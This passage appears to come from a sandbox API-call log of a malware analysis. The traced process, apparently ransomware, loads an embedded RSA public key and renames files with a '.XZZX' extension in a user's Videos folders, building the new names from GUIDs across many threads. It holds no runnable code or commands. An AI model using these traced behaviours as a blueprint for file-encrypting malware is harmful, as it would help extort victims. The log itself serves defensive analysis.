LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0199.094] lstrcpyW (in: lpString1=0x2caf460, lpString2="E29C4433332B9D3DB3332D67374C8185.XZZX" | out: lpString1="E29C4433332B9D3DB3332D67374C8185.XZZX") returned="E29C4433332B9D3DB3332D67374C8185.XZZX" [0199.094] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0199.094] SetErrorMode (uMode=0x1) returned 0x1 [0199.094] lstrcpyW (in: lpString1=0x2caf860, lpString2="E29C4433332B9D3DB3332D67374C8185.XZZX" | out: lpString1="E29C4433332B9D3DB3332D67374C8185.XZZX") returned="E29C4433332B9D3DB3332D67374C8185.XZZX" [0199.094] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xc6de02bc, Data2=0x9225, Data3=0x49b9, Data4=([0]=0x85, [1]=0xe8, [2]=0xcf, [3]=0xce, [4]=0x57, [5]=0x3e, [6]=0x8e, [7]=0x65))) returned 0x0 [0199.094] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\E29C4433332B9D3DB3332D67374C8185.XZZX") returned 104 [0199.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0199.094] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\5BA59D2C2A1629BDC6DE02BC2CE10E05.XZZX") returned 104 [0199.094] StrStrW (lpFirst="E29C4433332B9D3DB3332D67374C8185.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 768 os_tid = 0xe98 [0199.250] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0199.250] lstrcpyW (in: lpString1=0x2caf460, lpString2="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX" | out: lpString1="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX") returned="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX" [0199.250] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0199.250] SetErrorMode (uMode=0x1) returned 0x1 [0199.250] lstrcpyW (in: lpString1=0x2caf860, lpString2="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX" | out: lpString1="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX") returned="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX" [0199.250] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xab842115, Data2=0x440e, Data3=0x4076, Data4=([0]=0x9d, [1]=0x2b, [2]=0x4, [3]=0xc4, [4]=0xa, [5]=0x59, [6]=0x53, [7]=0x74))) returned 0x0 [0199.250] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX") returned 104 [0199.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0199.250] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\7A0363261122DE74AB84211513EDC2BC.XZZX") returned 104 [0199.250] StrStrW (lpFirst="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 769 os_tid = 0xea0 [0199.409] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0199.409] lstrcpyW (in: lpString1=0x2caf460, lpString2="3B9FB280013C30BC79FE404005721504.XZZX" | out: lpString1="3B9FB280013C30BC79FE404005721504.XZZX") returned="3B9FB280013C30BC79FE404005721504.XZZX" [0199.409] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0199.409] SetErrorMode (uMode=0x1) returned 0x1 [0199.409] lstrcpyW (in: lpString1=0x2caf860, lpString2="3B9FB280013C30BC79FE404005721504.XZZX" | out: lpString1="3B9FB280013C30BC79FE404005721504.XZZX") returned="3B9FB280013C30BC79FE404005721504.XZZX" [0199.409] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x82981843, Data2=0xf8, Data3=0x45d6, Data4=([0]=0xb7, [1]=0xcd, [2]=0xe5, [3]=0xc9, [4]=0x79, [5]=0x16, [6]=0x6e, [7]=0x1d))) returned 0x0 [0199.409] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\3B9FB280013C30BC79FE404005721504.XZZX") returned 90 [0199.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0199.409] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\835780E80043A75082981843030E8B98.XZZX") returned 90 [0199.409] StrStrW (lpFirst="3B9FB280013C30BC79FE404005721504.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 770 os_tid = 0xea4 [0199.563] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0199.563] lstrcpyW (in: lpString1=0x2caf460, lpString2="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX" | out: lpString1="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX") returned="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX" [0199.563] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0199.563] SetErrorMode (uMode=0x1) returned 0x1 [0199.563] lstrcpyW (in: lpString1=0x2caf860, lpString2="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX" | out: lpString1="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX") returned="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX" [0199.563] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xa1b3d33d, Data2=0xd5ca, Data3=0x4cd9, Data4=([0]=0xa9, [1]=0xe, [2]=0xce, [3]=0x9b, [4]=0x83, [5]=0x6d, [6]=0xd, [7]=0x7f))) returned 0x0 [0199.563] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\ADBC71E42FBA59E00D479B5F33DB3E28.XZZX") returned 90 [0199.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0199.563] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\36A66F22402D303AA1B3D33D42F81482.XZZX") returned 90 [0199.563] StrStrW (lpFirst="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 771 os_tid = 0xea8 [0199.718] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0199.718] lstrcpyW (in: lpString1=0x2caf460, lpString2="DB53A738127CCAEBB87D0318169DAF33.XZZX" | out: lpString1="DB53A738127CCAEBB87D0318169DAF33.XZZX") returned="DB53A738127CCAEBB87D0318169DAF33.XZZX" [0199.718] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0199.718] SetErrorMode (uMode=0x1) returned 0x1 [0199.718] lstrcpyW (in: lpString1=0x2caf860, lpString2="DB53A738127CCAEBB87D0318169DAF33.XZZX" | out: lpString1="DB53A738127CCAEBB87D0318169DAF33.XZZX") returned="DB53A738127CCAEBB87D0318169DAF33.XZZX" [0199.718] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x1877d3c, Data2=0xe6fd, Data3=0x4130, Data4=([0]=0xae, [1]=0x50, [2]=0xdb, [3]=0xd3, [4]=0xe, [5]=0x74, [6]=0x1a, [7]=0xf4))) returned 0x0 [0199.718] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\DB53A738127CCAEBB87D0318169DAF33.XZZX") returned 90 [0199.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0199.718] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\3D6AAC4C3AD18C7001877D3C3D9C70B8.XZZX") returned 90 [0199.718] StrStrW (lpFirst="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 772 os_tid = 0xeac [0199.877] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0199.877] lstrcpyW (in: lpString1=0x2caf460, lpString2="37E85546159C2E64B110DA791A0612AC.XZZX" | out: lpString1="37E85546159C2E64B110DA791A0612AC.XZZX") returned="37E85546159C2E64B110DA791A0612AC.XZZX" [0199.877] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0199.877] SetErrorMode (uMode=0x1) returned 0x1 [0199.877] lstrcpyW (in: lpString1=0x2caf860, lpString2="37E85546159C2E64B110DA791A0612AC.XZZX" | out: lpString1="37E85546159C2E64B110DA791A0612AC.XZZX") returned="37E85546159C2E64B110DA791A0612AC.XZZX" [0199.877] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xf27fe5bc, Data2=0xc9b8, Data3=0x4a6a, Data4=([0]=0xa2, [1]=0xc7, [2]=0xda, [3]=0xfb, [4]=0x3a, [5]=0xde, [6]=0x1c, [7]=0x10))) returned 0x0 [0199.877] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\37E85546159C2E64B110DA791A0612AC.XZZX") returned 85 [0199.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0199.877] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\B74DBB203AA2B630F27FE5BC3D6D9A78.XZZX") returned 85 [0199.877] StrStrW (lpFirst="37E85546159C2E64B110DA791A0612AC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 773 os_tid = 0xeb0 [0200.029] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0200.029] lstrcpyW (in: lpString1=0x2caf460, lpString2="8181DC6820279A95628FB268245D7EDD.XZZX" | out: lpString1="8181DC6820279A95628FB268245D7EDD.XZZX") returned="8181DC6820279A95628FB268245D7EDD.XZZX" [0200.029] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0200.029] SetErrorMode (uMode=0x1) returned 0x1 [0200.029] lstrcpyW (in: lpString1=0x2caf860, lpString2="8181DC6820279A95628FB268245D7EDD.XZZX" | out: lpString1="8181DC6820279A95628FB268245D7EDD.XZZX") returned="8181DC6820279A95628FB268245D7EDD.XZZX" [0200.030] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xc0a94b22, Data2=0xa437, Data3=0x4dab, Data4=([0]=0xb3, [1]=0xfd, [2]=0x9e, [3]=0xcf, [4]=0x7e, [5]=0xd, [6]=0x36, [7]=0xee))) returned 0x0 [0200.030] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\8181DC6820279A95628FB268245D7EDD.XZZX") returned 85 [0200.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0200.030] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\D880EC4E31D23BBDC0A94B22349D2005.XZZX") returned 85 [0200.030] StrStrW (lpFirst="8181DC6820279A95628FB268245D7EDD.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 774 os_tid = 0xeb4 [0200.186] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0200.186] lstrcpyW (in: lpString1=0x2caf460, lpString2="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX" | out: lpString1="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX") returned="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX" [0200.186] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0200.186] SetErrorMode (uMode=0x1) returned 0x1 [0200.186] lstrcpyW (in: lpString1=0x2caf860, lpString2="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX" | out: lpString1="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX") returned="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX" [0200.186] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x10b12c36, Data2=0xc6eb, Data3=0x43b6, Data4=([0]=0x9e, [1]=0x2e, [2]=0xa2, [3]=0xe5, [4]=0x5c, [5]=0x97, [6]=0x24, [7]=0xca))) returned 0x0 [0200.186] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\89DD89FE1BC33AFA435CA8A71FE81F42.XZZX") returned 85 [0200.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0200.186] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\5AD55992349CEC1210B12C363767D05A.XZZX") returned 85 [0200.186] StrStrW (lpFirst="89DD89FE1BC33AFA435CA8A71FE81F42.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 775 os_tid = 0xeb8 [0200.345] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 